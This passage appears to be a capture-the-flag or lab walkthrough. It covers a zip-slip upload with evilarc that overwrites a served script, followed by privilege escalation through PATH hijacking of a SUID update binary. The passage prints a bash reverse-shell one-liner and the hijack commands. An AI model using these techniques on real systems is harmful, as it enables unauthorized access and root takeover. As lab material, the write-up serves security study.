- Inside the
applicationdirectory:sudo chown root * - Then:
sudo chown www-data uploads overview.sh - Run:
python3 run.py
We generate a .zip file containing a file named ../overview.sh to overwrite the script executed when visiting /overview. We can use the evilarc tool for this purpose.
python evilarc.py -o unix -d 1 overview.shWe visit /overview to trigger the execution of the uploaded script. We gain access as www-data. In the update directory, we find a binary that executes a firmware_update.sh script as root. We perform Path Hijacking on the firmware_update.sh script (SUID) targeting the logger command. We create a malicious executable named logger:
# !/bin/bash
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1Then, we modify our PATH environment variable by prepending the current directory where we created the executable (logger).
export PATH=$(pwd):$PATHFinally, we execute the firmware_update binary to obtain a root shell.